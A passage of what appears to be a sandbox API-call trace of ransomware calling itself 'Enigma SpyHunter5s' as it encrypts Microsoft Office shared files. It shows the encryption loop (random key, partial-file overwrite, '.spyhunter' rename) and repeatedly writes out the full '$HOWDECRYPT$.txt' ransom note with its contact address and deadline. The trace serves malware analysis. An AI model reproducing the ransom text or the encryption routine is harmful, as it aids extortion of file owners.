hHeap=0x2c0000) returned 1 [0088.802] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0088.804] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0088.804] WriteFile (in: hFile=0x17c, lpBuffer=0x248fdaf*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fed8, lpOverlapped=0x0 | out: lpBuffer=0x248fdaf*, lpNumberOfBytesWritten=0x248fed8*=0x127, lpOverlapped=0x0) returned 1 [0088.805] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0088.805] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fed8, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fed8*=0x2ac, lpOverlapped=0x0) returned 1 [0088.805] CloseHandle (hObject=0x17c) returned 1 [0088.805] GetProcessHeap () returned 0x2c0000 [0088.805] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a868 | out: hHeap=0x2c0000) returned 1 [0088.805] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe78 | out: pbBuffer=0x248fe78) returned 1 [0088.805] GetProcessHeap () returned 0x2c0000 [0088.805] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0088.805] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe70*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe70*=0x30) returned 1 [0088.805] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0088.806] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML") returned 103 [0088.806] StrStrW (lpFirst="VisiorWW.XML", lpSrch=".txt") returned 0x0 [0088.806] GetProcessHeap () returned 0x2c0000 [0088.806] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37fcb0 [0088.806] ReadFile (in: hFile=0x17c, lpBuffer=0x37fcb0, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe34, lpOverlapped=0x0 | out: lpBuffer=0x37fcb0*, lpNumberOfBytesRead=0x248fe34*=0x2213, lpOverlapped=0x0) returned 1 [0089.251] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffdded, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.251] WriteFile (in: hFile=0x17c, lpBuffer=0x37fcb0*, nNumberOfBytesToWrite=0x2213, lpNumberOfBytesWritten=0x248fe34, lpOverlapped=0x0 | out: lpBuffer=0x37fcb0*, lpNumberOfBytesWritten=0x248fe34*=0x2213, lpOverlapped=0x0) returned 1 [0089.252] GetProcessHeap () returned 0x2c0000 [0089.252] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37fcb0 | out: hHeap=0x2c0000) returned 1 [0089.252] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.252] WriteFile (in: hFile=0x17c, lpBuffer=0x248fe74*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe34, lpOverlapped=0x0 | out: lpBuffer=0x248fe74*, lpNumberOfBytesWritten=0x248fe34*=0x4, lpOverlapped=0x0) returned 1 [0089.252] WriteFile (in: hFile=0x17c, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe34, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe34*=0x30, lpOverlapped=0x0) returned 1 [0089.252] CloseHandle (hObject=0x17c) returned 1 [0089.253] GetProcessHeap () returned 0x2c0000 [0089.253] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.253] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.spyhunter") returned 113 [0089.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\OFFICE14\\Office Setup Controller\\VISIOR\\VisiorWW.XML.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\office14\\office setup controller\\visior\\visiorww.xml.spyhunter")) returned 1 [0089.255] GetProcessHeap () returned 0x2c0000 [0089.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.255] GetProcessHeap () returned 0x2c0000 [0089.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0089.255] GetProcessHeap () returned 0x2c0000 [0089.255] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37a750 | out: hHeap=0x2c0000) returned 1 [0089.255] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe70 | out: pbBuffer=0x248fe70) returned 1 [0089.255] GetProcessHeap () returned 0x2c0000 [0089.255] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0089.255] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe68*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe68*=0x30) returned 1 [0089.255] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0089.259] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX") returned 69 [0089.259] StrStrW (lpFirst="MSWDS_EN.LEX", lpSrch=".txt") returned 0x0 [0089.259] GetProcessHeap () returned 0x2c0000 [0089.259] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.259] ReadFile (in: hFile=0x17c, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x248fe2c*=0x2800, lpOverlapped=0x0) returned 1 [0089.262] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.262] WriteFile (in: hFile=0x17c, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x248fe2c*=0x2800, lpOverlapped=0x0) returned 1 [0089.262] GetProcessHeap () returned 0x2c0000 [0089.262] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.262] SetFilePointerEx (in: hFile=0x17c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.262] WriteFile (in: hFile=0x17c, lpBuffer=0x248fe6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x248fe6c*, lpNumberOfBytesWritten=0x248fe2c*=0x4, lpOverlapped=0x0) returned 1 [0089.281] WriteFile (in: hFile=0x17c, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe2c*=0x30, lpOverlapped=0x0) returned 1 [0089.281] CloseHandle (hObject=0x17c) returned 1 [0089.360] GetProcessHeap () returned 0x2c0000 [0089.360] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x340fe8 [0089.363] wnsprintfW (in: pszDest=0x340fe8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.spyhunter") returned 79 [0089.363] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\PROOF\\MSWDS_EN.LEX.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\proof\\mswds_en.lex.spyhunter")) returned 1 [0089.364] GetProcessHeap () returned 0x2c0000 [0089.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x340fe8 | out: hHeap=0x2c0000) returned 1 [0089.364] GetProcessHeap () returned 0x2c0000 [0089.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0089.364] GetProcessHeap () returned 0x2c0000 [0089.364] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d558 | out: hHeap=0x2c0000) returned 1 [0089.364] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe70 | out: pbBuffer=0x248fe70) returned 1 [0089.364] GetProcessHeap () returned 0x2c0000 [0089.364] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0089.364] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe68*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe68*=0x30) returned 1 [0089.364] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0089.464] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL") returned 70 [0089.464] StrStrW (lpFirst="IETAG.DLL", lpSrch=".txt") returned 0x0 [0089.464] GetProcessHeap () returned 0x2c0000 [0089.464] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x37f868 [0089.465] ReadFile (in: hFile=0xcc, lpBuffer=0x37f868, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesRead=0x248fe2c*=0x2800, lpOverlapped=0x0) returned 1 [0089.529] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.529] WriteFile (in: hFile=0xcc, lpBuffer=0x37f868*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x37f868*, lpNumberOfBytesWritten=0x248fe2c*=0x2800, lpOverlapped=0x0) returned 1 [0089.530] GetProcessHeap () returned 0x2c0000 [0089.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37f868 | out: hHeap=0x2c0000) returned 1 [0089.530] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.530] WriteFile (in: hFile=0xcc, lpBuffer=0x248fe6c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x248fe6c*, lpNumberOfBytesWritten=0x248fe2c*=0x4, lpOverlapped=0x0) returned 1 [0089.531] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe2c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe2c*=0x30, lpOverlapped=0x0) returned 1 [0089.531] CloseHandle (hObject=0xcc) returned 1 [0089.786] GetProcessHeap () returned 0x2c0000 [0089.786] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0089.787] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL.spyhunter") returned 80 [0089.787] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Smart Tag\\IETAG.DLL.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\smart tag\\ietag.dll.spyhunter")) returned 1 [0089.787] GetProcessHeap () returned 0x2c0000 [0089.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c10048 | out: hHeap=0x2c0000) returned 1 [0089.787] GetProcessHeap () returned 0x2c0000 [0089.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0089.787] GetProcessHeap () returned 0x2c0000 [0089.787] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x37d990 | out: hHeap=0x2c0000) returned 1 [0089.787] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe68 | out: pbBuffer=0x248fe68) returned 1 [0089.788] GetProcessHeap () returned 0x2c0000 [0089.788] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0089.788] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe60*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe60*=0x30) returned 1 [0089.788] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Peacock.htm" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\peacock.htm"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.794] GetProcessHeap () returned 0x2c0000 [0089.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0089.794] GetProcessHeap () returned 0x2c0000 [0089.794] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x385de0 | out: hHeap=0x2c0000) returned 1 [0089.794] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe68 | out: pbBuffer=0x248fe68) returned 1 [0089.794] GetProcessHeap () returned 0x2c0000 [0089.794] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0089.794] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe60*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe60*=0x30) returned 1 [0089.794] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\Stationery\\Sand_Paper.jpg" (normalized: "c:\\program files\\common files\\microsoft shared\\stationery\\sand_paper.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.819] GetProcessHeap () returned 0x2c0000 [0089.819] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0089.819] GetProcessHeap () returned 0x2c0000 [0089.820] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3739f0 | out: hHeap=0x2c0000) returned 1 [0089.820] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0089.892] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0089.892] WriteFile (in: hFile=0x17c, lpBuffer=0x248fd97*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248fec0, lpOverlapped=0x0 | out: lpBuffer=0x248fd97*, lpNumberOfBytesWritten=0x248fec0*=0x127, lpOverlapped=0x0) returned 1 [0089.893] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0089.893] WriteFile (in: hFile=0x17c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248fec0, lpOverlapped=0x0 | out: lpBuffer=0x2d7a90*, lpNumberOfBytesWritten=0x248fec0*=0x2ac, lpOverlapped=0x0) returned 1 [0089.893] CloseHandle (hObject=0x17c) returned 1 [0089.894] GetProcessHeap () returned 0x2c0000 [0089.894] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x373e78 | out: hHeap=0x2c0000) returned 1 [0089.894] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x248fe60 | out: pbBuffer=0x248fe60) returned 1 [0089.894] GetProcessHeap () returned 0x2c0000 [0089.894] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x3228f8 [0089.894] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x3228f8*, pdwDataLen=0x248fe58*=0x20, dwBufLen=0x30 | out: pbData=0x3228f8*, pdwDataLen=0x248fe58*=0x30) returned 1 [0089.894] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xcc [0089.898] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV") returned 72 [0089.898] StrStrW (lpFirst="RECOVR32.CNV", lpSrch=".txt") returned 0x0 [0089.898] GetProcessHeap () returned 0x2c0000 [0089.898] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x376930 [0089.898] ReadFile (in: hFile=0xcc, lpBuffer=0x376930, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x248fe1c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesRead=0x248fe1c*=0x2800, lpOverlapped=0x0) returned 1 [0089.909] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0089.909] WriteFile (in: hFile=0xcc, lpBuffer=0x376930*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x248fe1c, lpOverlapped=0x0 | out: lpBuffer=0x376930*, lpNumberOfBytesWritten=0x248fe1c*=0x2800, lpOverlapped=0x0) returned 1 [0089.909] GetProcessHeap () returned 0x2c0000 [0089.909] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x376930 | out: hHeap=0x2c0000) returned 1 [0089.909] SetFilePointerEx (in: hFile=0xcc, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0089.909] WriteFile (in: hFile=0xcc, lpBuffer=0x248fe5c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x248fe1c, lpOverlapped=0x0 | out: lpBuffer=0x248fe5c*, lpNumberOfBytesWritten=0x248fe1c*=0x4, lpOverlapped=0x0) returned 1 [0089.919] WriteFile (in: hFile=0xcc, lpBuffer=0x3228f8*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x248fe1c, lpOverlapped=0x0 | out: lpBuffer=0x3228f8*, lpNumberOfBytesWritten=0x248fe1c*=0x30, lpOverlapped=0x0) returned 1 [0089.919] CloseHandle (hObject=0xcc) returned 1 [0089.976] GetProcessHeap () returned 0x2c0000 [0089.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c20090 [0089.977] wnsprintfW (in: pszDest=0x2c20090, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.spyhunter") returned 82 [0089.977] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv"), lpNewFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\TextConv\\RECOVR32.CNV.spyhunter" (normalized: "c:\\program files\\common files\\microsoft shared\\textconv\\recovr32.cnv.spyhunter")) returned 1 [0089.983] GetProcessHeap () returned 0x2c0000 [0089.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c20090 | out: hHeap=0x2c0000) returned 1 [0089.983] GetProcessHeap () returned 0x2c0000 [0089.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3228f8 | out: hHeap=0x2c0000) returned 1 [0089.983] GetProcessHeap () returned 0x2c0000 [0089.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x386400 | out: hHeap=0x2c0000) returned 1 [0089.983] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\ARCTIC\\$HOWDECRYPT$.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\arctic\\$howdecrypt$.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x15c [0089.998] lstrlenA (lpString="All your files are encrypted by Enigma SpyHunter5s!\r\nOur company SpyHunter is guaranteed to decrypt your files.\r\nCreating and removing viruses is our vocation.\r\nWe will provide you with professional support.\r\nYou have 72 hours to contact us.\r\nEmail us at :\r\nspyhunter5s@aol.com\r\nYour unique ID\r\n") returned 295 [0089.998] WriteFile (in: hFile=0x15c, lpBuffer=0x248fd8f*, nNumberOfBytesToWrite=0x127, lpNumberOfBytesWritten=0x248feb8, lpOverlapped=0x0 | out: lpBuffer=0x248fd8f*, lpNumberOfBytesWritten=0x248feb8*=0x127, lpOverlapped=0x0) returned 1 [0089.999] lstrlenA (lpString="MlqhQQvs4ugr474CE2uqNk66vNoKRygnBZEhFNDzlBXftMb/rGwheOeOKEXO8Run6u34y8iyAJ0Uvd2b1aq6++K8gbAqxyP4iKaa7bHV9YNnqCoikMIdk+TRximCVRjUsPfEMzeBphjPXklx6CithJLFvRaR+n5rnZ5lPbpvG6aExHLjo51bB737bpYnTojH7FQkCYek5ybab9yToaw+Dh8IMovhWg2MEEJNFBYLsGVcCQTcDFWcCBCYLRiW+K6wul6Ku/606jflgKae/iZ3Eq6VKcyT0LrOKoKe6HCvMfmi10xhQzvOcZSPbg6Ey67JZgGGhJWV8/Mn6gg/lsCLJQ1+2/DRVmmbxcF7sPZ8aN/DzKNPKPCTjLOY0QgIenKdKRcL7z/81/o3yrD+UAXT6mB9HTFtuJ01NnDvJxcbI+P9gdwyLPKaA1X3xLedKYfekjEtHJg8Lv0NIZbdVItu6LN5oSN2S5xErI8SxQVoJsIg0hXWpHdH6vkFX7pv/PbP2ZXsJUKG/8fKmTJva2QiEwGAFfxb31fIt+7Jio8uz00yqqait7qXW2AlmM1AcJsLkd1UzNzRyVPU43rR4HT4tuT7bXFnSTb8F7U4yVZt1cfsOg1BULXJF0Gnpnvrp/qGZZHblK9H9VR0c94+jFkTcs/MtnxZP+RNvf3SMjDktH8=") returned 684 [0089.999] WriteFile (in: hFile=0x15c, lpBuffer=0x2d7a90*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x248feb8, 